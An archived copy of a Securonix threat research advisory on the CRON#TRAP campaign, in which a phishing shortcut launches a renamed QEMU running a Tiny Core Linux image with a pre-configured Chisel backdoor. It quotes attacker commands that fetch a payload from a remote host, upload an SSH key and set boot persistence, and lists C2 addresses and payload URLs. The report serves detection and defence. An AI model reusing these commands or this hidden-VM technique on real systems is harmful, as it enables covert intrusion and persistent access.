{
	"id": "2600c996-e96f-4088-9a17-85122b82fbc8",
	"created_at": "2026-04-06T00:21:52.849795Z",
	"updated_at": "2026-04-10T03:24:18.039327Z",
	"deleted_at": null,
	"sha1_hash": "77466b25b3aacea9c971befea5c085e94ab411a8",
	"title": "CRON#TRAP: Emulated Linux Environments as the Latest Tactic in Malware Staging",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1432264,
	"plain_text": "CRON#TRAP: Emulated Linux Environments as the Latest Tactic\r\nin Malware Staging\r\nArchived: 2026-04-05 13:20:16 UTC\r\nSecuronix Threat Research Security Advisory\r\nBy Securonix Threat Research: Den Iuzvyk, Tim Peck\r\nNov 4, 2024\r\ntldr:\r\nIn a rather novel attack chain, attackers deploy a custom-made emulated QEMU Linux box to persist on\r\nendpoints, delivered through phishing emails.\r\nThe Securonix Threat Research team has been tracking an intriguing attack campaign that leverages a malicious\r\nshortcut (.lnk) file. When executed, this file extracts and initiates a lightweight, custom Linux environment\r\nemulated through QEMU.\r\nWhat makes the CRON#TRAP campaign particularly concerning is that the emulated Linux instance comes pre-configured with a backdoor that automatically connects to an attacker-controlled Command and Control (C2)\r\nserver. This setup allows the attacker to maintain a stealthy presence on the victim’s machine, staging further\r\nmalicious activity within a concealed environment, making detection challenging for traditional antivirus\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 1 of 13\n\nsolutions. Since QEMU is legitimate software, often used in development and research, its presence typically\r\nwon’t trigger any security alarms.\r\nWe were unfortunately not able to establish confident attribution or victimology with this campaign. However,\r\nbased on sample telemetry, most sources appeared to originate from the US and Europe. Additionally, based on the\r\nverbiage used throughout the campaign and considering the command and control servers were located within the\r\nUnited States, allowing us to suggest with low to medium confidence that North America may have been a\r\nprimary target.\r\nBefore we get ahead of ourselves, let’s back it up a little bit. So what is QEMU and how can it be used\r\nmaliciously?\r\nIn a nutshell, QEMU (Quick Emulator) is a legitimate, open-source virtualization tool that allows for emulating\r\nvarious hardware and processor architectures, enabling them to run different operating systems or applications in a\r\nvirtualized environment. It can simulate processors like x86, ARM, and PowerPC, making it versatile for testing,\r\ndevelopment, and research. In the case of the CRON#TRAP campaign, the attackers opted to emulate a Linux\r\ninstallation of Tiny Core Linux. As far as we can determine, this is the first time that this tool has been used by\r\nattackers for malicious purposes outside of Cryptomining.\r\nInitial infection\r\nWhile our team was not able to derive the original source of the attack, we believe that the attack began with a\r\nphishing email which contained a link to download a zip file. The theme appears to be survey-related.\r\nTaking a quick look at the zip file, it is absolutely massive for a phishing document. The file stands at an\r\nimpressive 285MB which could raise suspicions to some users. When the user extracts the archive, they’re\r\npresented with a single file (shortcut) and a “data” directory containing the entire QEMU installation directory.\r\nThe entirety of the data folder’s contents have the hidden attribute applied, so unless the user has the “view hidden\r\nfiles” Explorer option enabled, they won’t see any contained contents.\r\nTaking a look at the shortcut file, it appears to link to the system’s PowerShell process and executes a simple\r\ncommand. The command takes the downloaded zip file and (re)extracts its contents into the user’s profile\r\ndirectory into a directory called “datax”. It then executes start.bat contained at:\r\n“$home\\datax\\data\\start.bat”\r\nThe batch file start.bat accomplishes two tasks. First, it uses explorer.exe to display a “server error” to the user\r\nimplying that the link or URL to the survey was somehow broken on the server-side. The user at this point would\r\nprobably dismiss the error. The entirety of the start.bat code can be seen in the image below. Second, the script\r\nexecutes the QEMU process and command line to start the emulated Linux environment. The process qemu.exe\r\nwas renamed to fontdiag.exe by the attacker prior to delivery of the phishing lure.\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 2 of 13\n\nFigure 1: contents of start.bat\r\nLure document\r\nThe image is executed by the explorer.exe process. Since the image is hosted on a remote server via HTTPS, the\r\nuser’s default browser would open and display the image. The image is a simple server error message. While there\r\nis technically no error, rather an image of the error, the attackers would hope this would be glanced over by the\r\nuser. The image was hosted on a public site:\r\nhxxps://forum.hestiacp[.]com/uploads/default/original/2X/9/9aae76309a614c85f880512d8fe7df158fec52cc.png\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 3 of 13\n\nFigure 2: Lure image (masquerading as a server error)\r\nQEMU: Mount and execute\r\nAs mentioned earlier, the QEMU process was renamed and executed using the start.bat script. This QEMU\r\nprocess is the legitimate process and is digitally signed using a valid digital certificate. The Linux box was\r\nexecuted using the following command:\r\nSTART /B %HOMEPATH%\\datax\\data\\fontdiag.exe -drive file=%HOMEPATH%\\datax\\data\\tc.img -nographic \u0026\r\nThe use of the “-nographic” parameter means that the Linux virtual environment will run silently in the\r\nbackground. For the sake of analysis, we removed this to interact with the OS. Fortunately, as we don’t know the\r\nuser’s password, auto login was enabled! At this stage, we can interact with the OS.\r\nPivotBox: Exploring the attacker’s Linux environment\r\nAs seen in the image below, the MOTD banner displays “PivotBox” as well as an options command. These appear\r\nto be custom-set by the attacker as we witnessed many edits to /etc/motd and the user’s .ashrc file (see history\r\nsection below). This file is the user’s profile configuration for the Almquist Shell (often referred to as ash), a\r\nlightweight shell commonly used in Unix-like operating systems.\r\nThe options command yielded two “special commands”  get-host-shell  and  get-host-user  which allow for\r\ninteracting with the host.\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 4 of 13\n\nFigure 3: Screenshot of “PivotBox” – custom Tiny Core Linux QEMU instance\r\nThe  get-host-shell  alias created by the attacker attempts to spawn an interactive shell on the host machine by\r\ninitiating an SSH connection. The command uses information stored in a QEMU-specific\r\nfile,  /sys/firmware/qemu_fw_cfg/by_name/opt/usercontext/raw , which contains user context information.\r\nThe command points to IP 10.0.2.2, a common IP for host-guest communication in virtualized environments,\r\nwhich serves as an alias to the host’s loopback interface.\r\nThe  get-host-user  Alias fetches and displays the username or context that the QEMU instance is running under\r\non the host by reading from usercontext/raw.\r\nExploring PivotBox’s command history\r\nLinux by default will store a record of all commands executed by the user inside the user’s profile directory. As\r\nthe ash shell was used, we were fortunate to find that we had obtained a command record of the creation of the\r\nPivotBox Linux image. Typically good OPSEC (operational security) would entail clearing the history, especially\r\nif the image would be deployed elsewhere. We’re not sure if this was a lapse in the attacker’s workflow, or if they\r\njust didn’t care.\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 5 of 13\n\nFigure 4: Screenshot of a portion of the attacker’s .ash_history file\r\nWhile there’s a lot to unpack, let’s take a look at some of the highlights that we discovered. The .ash_history file\r\nprovided us with a series of steps that suggest an advanced attempt at persistence by creating this stealthy toolkit\r\nwithin its own environment Here’s a breakdown of the key actions:\r\nNetwork Testing \u0026 Initial Reconnaissance\r\nCommands:  ping google.com  and  wget\r\nPurpose: Confirm network connectivity and attempt to fetch remote resources (likely staging or payload files)\r\nfrom both IP-based URLs (192.168.160.143) and GitHub-hosted content. The private 192 address would appear to\r\nbe from the attacker’s testing infrastructure.\r\nTool Installation and Preparation\r\nCommands:  tce-load -wi [tool]\r\nPurpose: This Tiny Core Linux ( tce ) command installs tools such as vim, file, and openssh, indicating the\r\nattacker is preparing the environment for modifications, file analysis, and SSH access.\r\nImplication: The installation of openssh hints at establishing persistent remote access.\r\nPayload Manipulation and Execution\r\nCommands:  ./crondx, chmod +xcrondx, ln -s /lib /lib64\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 6 of 13\n\nPurpose: Execution of crondx, potentially after renaming or replacing files downloaded from the attacker’s server\r\nor GitHub repositories. Linking /lib to /lib64 suggests an attempt to bypass environment dependencies.\r\nObservations:\r\nwget http://192.168.160.143:8000/crondxdownloads a file to be used as crondx, later executed multiple\r\ntimes with variations ( ./crondx, /bin/bash ./crondx ).\r\nRegular use of file analysis (file crondx) indicates testing or validation of each download.\r\nConfiguration Persistence and Privilege Escalation\r\nCommands:  sudo vim /opt/bootlocal.sh, filetool.sh -b\r\nPurpose: Editing /opt/bootlocal.sh is used to persist changes across reboots. Using filetool.sh -b  is a method\r\nto save changes in Tiny Core Linux’s file structure, ensuring that any modifications to system configuration are\r\nretained.\r\nPersistence: By modifying and backing up configurations, it ensures that crondx will be reloaded or re-executed\r\non each start of the QEMU instance.\r\nSSH Key Manipulation for Remote Access\r\nCommands:  ssh-keygen -t rsa, curl --upload-file ~/.ssh/id_rsa.pub\r\nPurpose: By generating an SSH key and uploading the public key, the attacker aims to access the target machine\r\nwithout a password.\r\nImplication: This is a classic persistence technique, allowing re-entry into the environment by using SSH keys\r\nuploaded to a known location.\r\nFile and Environment Management\r\nCommands:  tce-load -i 7z, unzip, 7z x [archive.zip]\r\nPurpose: Frequent use of archive tools shows a method for handling large file transfers or additional payloads\r\nwhile maintaining an organized working environment.\r\nThe repeated downloads and extractions of files (such as resolvd.zip, ch.zip) likely contain supplementary\r\npayloads or configurations.\r\nSystem and User Enumeration\r\nCommands:  get-host-user, uname -a, df, ls -hal\r\nPurpose: Basic reconnaissance to understand the environment, identify user information, and confirm file\r\nlocations.\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 7 of 13\n\nImplication: This allows the attacker to adjust actions based on system architecture or available space, tailoring\r\ncommands to the target.\r\nPotential Exfiltration or Command Control Channels\r\nCommands:  wget hxxps://free[.]keep.sh\r\nPurpose: Using a free file-sharing service could serve as an exfiltration channel for SSH keys or other sensitive\r\nfiles.\r\nSummary of the command history:\r\nLike a game of chess, the attackers prepped their environment with a strategy in mind. They systematically\r\ninstalled, tested, and executed multiple payloads and configurations, each preparing for the next phase. The use of\r\nbootlocal.sh and SSH keys indicates they’re aiming for a reliable presence on the machine. There were several\r\ntimes where they downloaded crondx files from various URLs. The reasons for this were unknown, however we\r\nspeculate that they could have been modifying the payload until it functions as expected.\r\nAnalysis of crondx (Chisel)\r\nThe binary file that gets executed at the startup of the Linux QEMU instance is located at /home/tc/crondx. The\r\nfile is a 64-bit ELF executable compiled in Go (golang). Some of the high level details can be found below.\r\nFigure 5: File overview of crondx\r\nUpon closer inspection, the binary appears to be a pre-configured Chisel client designed to connect to a remote\r\nCommand and Control (C2) server at 18.208.230[.]174 via websockets. Typically, a Chisel client requires\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 8 of 13\n\ncommand-line parameters to specify modes (client or server) and connection details. In this case, however, the\r\nattackers opted to hard-code these parameters directly into the binary, removing the need for external\r\nconfiguration. This customization is straightforward due to Chisel’s open-source nature and allows the binary to\r\nexecute with minimal visibility, making detection more challenging.\r\nAccording to Chisel’s GitHub, it is “…a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single\r\nexecutable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through\r\nfirewalls, though it can also be used to provide a secure endpoint into your network.” Chisel’s design makes it\r\nparticularly effective for creating covert communication channels and tunneling through firewalls, often under the\r\nradar of network monitoring tools.\r\nThe attackers’ approach effectively transforms this Chisel client into a full backdoor, enabling remote command\r\nand control traffic to flow in and out of the Linux environment. This setup provides them with persistent,\r\nencrypted access to the compromised system that would allow them to manage additional payloads or exfiltrate\r\ndata at will.\r\nWrapping up…\r\nThe CRON#TRAP campaign demonstrates a sophisticated and novel approach to compromising systems through\r\na combination of phishing, emulated environments, and stealthy pre-configured tunneling. What makes this\r\ncampaign so interesting is the fact that it begins with a rather standard sequence of events, a phishing lure, leading\r\nto the download of a large zip file containing a malicious .lnk shortcut. However, things take a dramatic turn once\r\ncode execution begins. PowerShell is used to kick off a chain of events that lead to the starting of an entire\r\nemulated Linux environment using a disguised QEMU executable. This emulated Linux environment enables the\r\nattacker to operate outside the visibility of traditional antivirus solutions.\r\nWithin this environment, a highly customized setup unfolds. The emulated system includes a crondx (Chisel)\r\nbinary, a tunneling tool commonly used for passing data covertly through firewalls. The Chisel client is pre-configured with hard-coded parameters, allowing it to connect automatically to a remote Command and Control\r\n(C2) server via websockets, providing attackers with a persistent backdoor into the environment.\r\nThe attacker’s presence in the emulated Linux system is further reinforced by various persistence techniques.\r\nThrough modifications in startup scripts and the use of SSH keys, they ensure continued access even after reboots.\r\nCommand aliases, such as  get-host-shell  and  get-host-user , allow them to interact directly with the host\r\nmachine from within the isolated QEMU environment, a feature likely intended to facilitate lateral movement or\r\ndata exfiltration.\r\nThe  .ash_history  file reveals a trail of actions taken to install tools, gather system information, and download\r\nadditional payloads, showcasing a modular and adaptive attack method. The attacker’s reliance on legitimate\r\nsoftware like QEMU and Chisel adds an additional layer of evasion, as these tools are unlikely to trigger alerts in\r\nmany environments.\r\nSecuronix recommendations\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 9 of 13\n\nAs this campaign likely started using phishing emails, avoid downloading files or attachments from\r\nexternal sources, especially if the source was unsolicited. Common file types include zip, rar, iso, and pdf.\r\nAdditionally, external links to download these kinds of files should be considered equally dangerous. Zip\r\nfiles, sometimes password-protected,  were used during this campaign.\r\nMonitor common malware staging directories, especially script-related activity in world-writable\r\ndirectories. In the case of this campaign the threat actors staged their QEMU instance from the user’s home\r\ndirectory at:  %HOME%\\datax .\r\nMonitor for the use of legitimate software being executed from unusual locations.\r\nWe strongly recommend deploying robust endpoint logging capabilities to aid in PowerShell detections.\r\nThis includes leveraging additional process-level logging such as Sysmon and PowerShell logging for\r\nadditional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nInitial Access T1566.001: Phishing: Spearphishing Attachment\r\nCommand and Control\r\nT1071.001: Application Layer Protocol: Web Protocols\r\nT1132: Data Encoding\r\nT1572: Protocol Tunneling\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1036: Masquerading\r\nT1218: System Binary Proxy Execution\r\nT1564.006: Hide Artifacts: Run Virtual Instance\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1204.001: User Execution: Malicious Link\r\nT1204.002: User Execution: Malicious File\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 10 of 13\n\nPersistence T1072: Software Deployment Tools\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND destinationaddress =\r\n“18.208.230[.]174”\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND destinationhostname\r\nCONTAINS\r\n“forum.hestiacp[.]com/uploads/default/original/2X/9/9aae76309a614c85f880512d8fe7df158fec52cc.png”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “File\r\ncreated” OR deviceaction = “File created (rule: FileCreate)”) AND customstring49 ENDS WITH\r\n“\\\\datax\\\\data\\\\fontdiag.exe”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process\r\nCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2”\r\nOR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”)\r\nAND customstring48 = “QEMU machine emulators and tools” AND customstring54 NOT CONTAINS\r\n“\\\\Program Files”\r\nC2 and infrastructure\r\nC2 Address\r\n18.208.230[.]174\r\ngithub[.]com/yaniraenrica/testing/raw/main/resolvd.zip\r\ngithub[.]com/rustyshackleford72/testing/raw/main/cheezel-client\r\ngithub[.]com/gregtunny/data/raw/refs/heads/main/ch.zip\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 11 of 13\n\nforum.hestiacp[.]com/uploads/default/original/2X/9/9aae76309a614c85f880512d8fe7df158fec52cc.png\r\nReferences:\r\n1. LoudMiner: Cross-platform mining in cracked VST software\r\nhttps://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/\r\nAnalyzed files/hashes\r\nSHA256\r\nCE26AAC9BA7BE60BFB998BA6ADD6B34DA5A68506E9FEA9844DC44BAFE3CAB676\r\n0618BB997462F350BC4402C1A5656B38BEDC278455823AC249FD5119868D3DF4\r\n9FFAD9CF6D93B21BB0CA15DE9AB9E782E78F2B6356D05FB55FB95F55BEC9FC04\r\n002f9cd9ffa4b81301d003acd9fb3fbba1262e593b4f2e56a085b62a50e76510\r\n5A8BC06587CE40B3A8D8DD4037D0EF272EFC64A69E21F6689FFE3F5FBB04A468\r\n4C91070877C6D116F5A27EFADDBBFBC339455628E9D6585A4EA5F9B6972BF92B\r\nBC7A34379602F9F061BDB94EC65E8E46DA0257D511022A17D2555ADBD4B1DD38\r\n3E6A47DA0A226A4C98FB53A06EC1894B4BFD15E73D0CEA856B7D2A001CADA7E9\r\n9A33EA831EDF83CB8775311963F52299F1488A89651BD3471CC8F1C70F08A36C\r\n82A9747485FDD60360D28CD73671F171A8312B7D68B26FE1E2D472EB97C4FE59\r\nF4229128EF642D299F7AB5FBCB6DE75A17D12F30F22A3985044C8B1B44F1768F\r\n6903BDF7F4A22ECFDDBAEE0B16E3DEE85DBB169AA446094BB3D1B75526677B6C\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 12 of 13\n\nSource: https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nhttps://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/"
	],
	"report_names": [
		"crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434912,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/77466b25b3aacea9c971befea5c085e94ab411a8.pdf",
		"text": "https://archive.orkl.eu/77466b25b3aacea9c971befea5c085e94ab411a8.txt",
		"img": "https://archive.orkl.eu/77466b25b3aacea9c971befea5c085e94ab411a8.jpg"
	}
}